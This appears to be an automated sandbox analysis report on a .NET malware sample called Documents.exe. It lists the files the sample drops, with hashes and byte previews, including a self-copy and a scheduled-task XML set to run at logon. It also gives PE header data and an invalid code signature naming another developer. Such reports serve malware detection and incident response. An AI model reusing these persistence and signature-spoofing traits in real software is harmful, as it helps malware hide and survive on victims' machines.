                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                        Malicious:true
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uFEeKIucsX.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.34331486778365
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):2232
                                                                        Entropy (8bit):5.379909843762687
                                                                        Encrypted:false
                                                                        SSDEEP:48:BWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMugeC/ZPUyus:BLHxv2IfLZ2KRH6Oug8s
                                                                        MD5:5ED93D92EEA0E547284B97AD38FEDAFF
                                                                        SHA1:D3A57A1AE4C91873D51144CFFD69C8AEB27B7F67
                                                                        SHA-256:381012991B65EDA1C67E5DD4E66550FE3A4D227A3BD755ED68D10F8F1356D649
                                                                        SHA-512:4FA84B90455DE3D10BB007BF2581658FE6F4A5D644A5960B1E8D038FEC5C95DAC339D19BAF01A930581671886628AB121B7C545A1CAEEC3CEF6AD81D6F1B1064
                                                                        Malicious:false
                                                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                        C:\Users\user\AppData\Local\Temp\H846yjBj

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\systray.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yibagtm.ur2.psm1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbfnblqb.nrs.ps1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idq5l0dc.ny3.ps1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldyrd5pv.iaj.psm1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb0xsedr.bgl.psm1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3b5i1hh.a1r.psm1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0cdzsmc.x0l.ps1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wq0oddbv.rzd.ps1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\tmp2505.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Documents.exe
                                                                        File Type:XML 1.0 document, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1583
                                                                        Entropy (8bit):5.105402202780381
                                                                        Encrypted:false
                                                                        SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWNxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
                                                                        MD5:F792F12263356811E7EC07A7A9D1D135
                                                                        SHA1:2EED032342D1ED944E7184243E3934FA2D042184
                                                                        SHA-256:F72A4D87B2A12D8A59F945EEED4BA453238905C1486501A99B9BE8924125A5AC
                                                                        SHA-512:DBAE75E3310A6AE15BA022686A4AE9E584182FE0D0688A3C116334EEB00282B44CE9A00B210CE9F4B8221B218AF6D3C6C300AB7ED81DBD87D15173332C955303
                                                                        Malicious:true
                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                        C:\Users\user\AppData\Local\Temp\tmp4E47.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
                                                                        File Type:XML 1.0 document, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1583
                                                                        Entropy (8bit):5.105402202780381
                                                                        Encrypted:false
                                                                        SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWNxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
                                                                        MD5:F792F12263356811E7EC07A7A9D1D135
                                                                        SHA1:2EED032342D1ED944E7184243E3934FA2D042184
                                                                        SHA-256:F72A4D87B2A12D8A59F945EEED4BA453238905C1486501A99B9BE8924125A5AC
                                                                        SHA-512:DBAE75E3310A6AE15BA022686A4AE9E584182FE0D0688A3C116334EEB00282B44CE9A00B210CE9F4B8221B218AF6D3C6C300AB7ED81DBD87D15173332C955303
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                        C:\Users\user\AppData\Roaming\uFEeKIucsX.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Documents.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):929800
                                                                        Entropy (8bit):7.84469641614054
                                                                        Encrypted:false
                                                                        SSDEEP:24576:4t2xjPLCnYn28/zBe7Rw4/apNbasfpKHSnfry:4AcnY28/9MRzmskpKHSnfW
                                                                        MD5:0C0B6ED60E0309998DA4AE71469F1D84
                                                                        SHA1:030176B42AAC8F2FD5E0358E817491D3C334A686
                                                                        SHA-256:83B760B0B764A209333A2B903015FF3F6DF831FAF20BE20B836563C54E3370B1
                                                                        SHA-512:7F484ECE6A2B6910366BDD50EA14ABF61034BBB22A540378EFB04D48CFD68D021FA8DD5F7F3A27DF109090F6B4935CF019CA1251565B0E585F39AFAAF1A5442F
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0......\.......... ........@.. .......................@............@.................................x...O........Y...............6... ....................................................... ............... ..H............text...P.... ...................... ..`.rsrc....Y.......Z..................@..@.reloc....... ......................@..B........................H.......P<..x5......$....q...G..........................................z..}.....(........}.....(.....*..*...0............{.....+..*&...}....*...0............{....o.....+..*....0..B.........{...., .{....o....,..(....o..........+....,...(....o....oB.....*...0..B.........{...., .{....o....,..(....o..........+....,...(....o....oD.....*..r...p.{....%-.&.+.o....(....(....&*..0..E.........{....o.........,1...}.....(.....{....o ...o!.....(....o....oB.....*>..{.....o"....**...(#....*

                                                                        C:\Users\user\AppData\Roaming\uFEeKIucsX.exe:Zone.Identifier

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Documents.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.84469641614054
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:Documents.exe
                                                                        File size:929'800 bytes
                                                                        MD5:0c0b6ed60e0309998da4ae71469f1d84
                                                                        SHA1:030176b42aac8f2fd5e0358e817491d3c334a686
                                                                        SHA256:83b760b0b764a209333a2b903015ff3f6df831faf20be20b836563c54e3370b1
                                                                        SHA512:7f484ece6a2b6910366bdd50ea14abf61034bbb22a540378efb04d48cfd68d021fa8dd5f7f3a27df109090f6b4935cf019ca1251565b0e585f39afaaf1a5442f
                                                                        SSDEEP:24576:4t2xjPLCnYn28/zBe7Rw4/apNbasfpKHSnfry:4AcnY28/9MRzmskpKHSnfW
                                                                        TLSH:86151260119BE901C8D10B7049A3D3F59B709DC9F921C30BABEAAFFBBC7615629543E4
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0......\........... ........@.. .......................@............@................................

                                                                        File Icon

                                                                        Icon Hash:099bce4dd131078e

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4db9ca
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6747CC9F [Thu Nov 28 01:51:27 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Authenticode Signature

                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                        Error Number:-2146869232
                                                                        Not Before, Not After
                                                                        • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                                                        Subject Chain
                                                                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                        Version:3
                                                                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                        Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        adc dword ptr [eax], eax
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [esi], bh
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax+00h], al
                                                                        add byte ptr [eax], al
                                                                        push edi
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [ebp+00h], bl
                                                                        add byte ptr [eax], al
                                                                        pop edi
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [edx+00h], ah
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [esi], cl
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [edi], bl
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [edx], ch
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax+eax+00h], dl
                                                                        add byte ptr [ebx+00h], al
                                                                        add byte ptr [eax], al
                                                                        pop ebx
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax+eax+00h], ah
                                                                        add byte ptr [ecx], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax+eax], al
                                                                        add byte ptr [eax], al
                                                                        or dword ptr [eax], eax
                                                                        add byte ptr [eax], al
                                                                        adc eax, 1C000000h
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [ebx], dh
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [edi+00h], al
                                                                        add byte ptr [eax], al
                                                                        push eax
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [edi], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [edx], ah
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [ebx], dl
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax+eax], bh
                                                                        add byte ptr [eax], al
                                                                        sbb byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        dec ecx
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [ebx+00h], cl
                                                                        add byte ptr [eax], al
                                                                        dec edi
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xdb9780x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xdc0000x59f0.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xdfa000x3608
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xe20000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xd9a500xd9c002f5c3171a2cf43d8a80bd69fcf68ac68False0.9284093355338691data7.844297233774946IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xdc0000x59f00x5a00e4d307e65c721571a751df028819110dFalse0.9299479166666667data7.857965853300758IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
